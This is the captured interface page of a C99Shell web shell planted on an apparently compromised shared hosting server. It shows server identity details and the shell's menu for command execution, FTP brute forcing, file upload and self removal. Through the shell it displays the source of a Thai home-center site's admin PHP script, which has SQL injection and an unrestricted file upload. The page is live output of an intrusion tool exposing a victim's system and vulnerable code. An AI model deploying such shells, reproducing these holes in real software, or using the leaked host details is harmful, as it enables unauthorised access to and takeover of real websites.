!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.62 GB of 981.82 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     portfolio_update.php (7.24 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
include 'index_IncludeAdmin.php'
$_SESSION['page'] = 'portfolio.php';

if (isset(
$_GET[portfolio_id])){
    
$_SESSION[portfolio_id] =  $_GET[portfolio_id];
}
$portfolio_id =   $_SESSION[portfolio_id] ;

$portfolio_SL " SELECT * FROM portfolio WHERE portfolio_id = '$portfolio_id'";
$portfolio_QR mysqli_query($con,$portfolio_SL);
$portfolio     mysqli_fetch_array($portfolio_QR);

if (
$_POST['portfolioUpdate']) {

    
$salesteam_id htmlspecialchars($_POST['salesteam_id'], ENT_QUOTES );
    
$portfolio_name htmlspecialchars($_POST['portfolio_name'], ENT_QUOTES );
    
$portfolio_detail htmlspecialchars($_POST['portfolio_detail'], ENT_QUOTES );
    
$portfolio_review function_review($_POST['portfolio_review']);
    
$portfolio_page function_page(random_string().$_POST['portfolio_name']);

    
$portfolio_Update "UPDATE `portfolio` SET `portfolio_datetime` = NOW(),
    `salesteam_id` = '
$salesteam_id',
    `portfolio_page` = '
$portfolio_page',
    `portfolio_name` = '
$portfolio_name',
    `portfolio_detail` = '
$portfolio_detail',
    `portfolio_review` = '
$portfolio_review' WHERE `portfolio_id` = '$portfolio_id'";
    
$portfolio_Reult mysqli_query($con,$portfolio_Update);

    if (!
$portfolio_Reult) {
        echo
"<script>alert('เกิดข้อผิดพลาด'); window.history.back(); </script>";
    }

    if(
$_FILES['portfolio_photo']['name']!=''){
        @
unlink("../Files/portfolio_photo/".$portfolio['portfolio_photo']);
        
$file rand().$_FILES["portfolio_photo"]["name"];
        
$upload move_uploaded_file($_FILES["portfolio_photo"]["tmp_name"],"../Files/portfolio_photo/".$file);
        
$portfolio_photo_Update "UPDATE `portfolio` SET `portfolio_photo` = '$file' WHERE `portfolio_id` = '$portfolio_id'";
        
$portfolio_photo_Reult mysqli_query($con,$portfolio_photo_Update);
    }

    if (
$portfolio_Reult) {
        echo
"<script>   window.location='portfolio_one.php?UPDATE'; </script>";
    }
    
}

?>

<!DOCTYPE html>
<html>
<head>
    <? include 'index_Head.php'?>
</head>
<body>
    <? include 'index_Navbar.php'?>    
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-2" id="main-left">
                <div class="row">
                    <div class="col-md-12">
                        <? include 'index_AdminMenu.php'?>
                    </div>
                </div>
            </div>
            <div class="col-md-10">
                <div class="row">
                    <div class="col-md-12">
                        <h3>  แก้ไข ผลงาน : <span class="text-primary bold"> <?php echo $portfolio[portfolio_name]; ?> </span>  </h3>
                        <hr>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 br-margin2">
                        <a href="portfolio_one.php" class="btn btn-primary"><span class="glyphicon glyphicon-step-backward"></span> กลับ </a>
                    </div>
                    <div class="col-md-12">
                        <form class="form-horizontal" method="post" enctype="multipart/form-data">
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    กรอกรายละเอียด "ผลงาน" ที่ต้องการแก้ไข
                                </div>
                                <div class="panel-body">
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ชื่อผลงาน  <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <input id="portfolio_name" type="text" class="form-control" value="<? echo $portfolio[portfolio_name]; ?>" name="portfolio_name"  required  maxlength="80" placeholder="ความยาวไม่เกิน 80  ตัวอักษร" >
                                        </div>
                                        <label class="control-label col-md-3 text-left" > <span id="portfolio_name_chars" class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var portfolio_name = 80;
                                            $('#portfolio_name').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = portfolio_name-length;
                                                $('#portfolio_name_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รายละเอียดเบื้องต้น </label>
                                        <div class="col-md-6">
                                            <textarea id="portfolio_detail" class="form-control" rows="4" name="portfolio_detail"  maxlength="250" placeholder="รายละเอียดแนะนำ สั้นๆ ความยาวไม่เกิน 250  ตัวอักษร"><? echo $portfolio[portfolio_detail]; ?></textarea>
                                        </div>
                                        <label class="control-label col-md-2 text-left" > <span id="portfolio_detail_chars"  class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var portfolio_detail = 250;
                                            $('#portfolio_detail').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = portfolio_detail-length;
                                                $('#portfolio_detail_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ผลงานของ </label>
                                        <div class="col-md-6">
                                            <select class="form-control"   name="salesteam_id" >
                                                <?
                                                $salesteam_SL 
" SELECT * FROM salesteam WHERE salesteam_id = '$portfolio[salesteam_id]'";
                                                
$salesteam_QR mysqli_query($con,$salesteam_SL);
                                                
$salesteam     mysqli_fetch_array($salesteam_QR);

                                                if (!isset(
$salesteam[salesteam_id])||$salesteam[salesteam_id]=='') {
                                                    
?>
                                                    <option value="">--</option>
                                                    <?
                                                
}
                                                else{
                                                    
?>
                                                    <option value="<?php echo $salesteam[salesteam_id]; ?>"><? echo $salesteam[salesteam_name]; ?></option>
                                                    <?
                                                
}

                                                
$salesteam_SL " SELECT * FROM salesteam WHERE salesteam_id != '$portfolio[salesteam_id]' ORDER BY salesteam_id ASC";
                                                
$salesteam_QR     mysqli_query($con,$salesteam_SL);
                                                while (
$salesteam     mysqli_fetch_array($salesteam_QR)) {
                                                    
?>
                                                    <option value="<?php echo $salesteam[salesteam_id]; ?>"><?php echo $salesteam[salesteam_name]; ?></option>
                                                    <?
                                                
}
                                                
?>
                                                <option value="">นำออกจากรายการ</option>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group"> 
                                        <div class="col-md-offset-3 col-md-6">
                                            <button onclick="return confirm('ยืนยันการแก้ไข ? ')" type="submit"  class="btn btn-info">
                                                <span class="glyphicon glyphicon-floppy-disk"></span> บันทึกการแก้ไข
                                            </button>
                                            <input type="hidden" name="portfolioUpdate" value="x">
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    เนื้อหา
                                </div>
                                <div class="panel-body">
                                    <textarea class="ckeditor" name="portfolio_review">
                                        <? echo $portfolio[portfolio_review]; ?>
                                    </textarea>
                                </div>
                                <div class="panel-footer">
                                    แก้ไขล่าสุด : <?php echo $portfolio[portfolio_datetime]; ?>
                                </div>
                            </div>    
                        </form>
                    </div>
                    <!-- 12 -->
                </div>
                <!-- row -->
            </div>
            <!-- 10 -->
        </div>
        <!-- row -->
    </div>
    <!-- container -->
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0131 ]--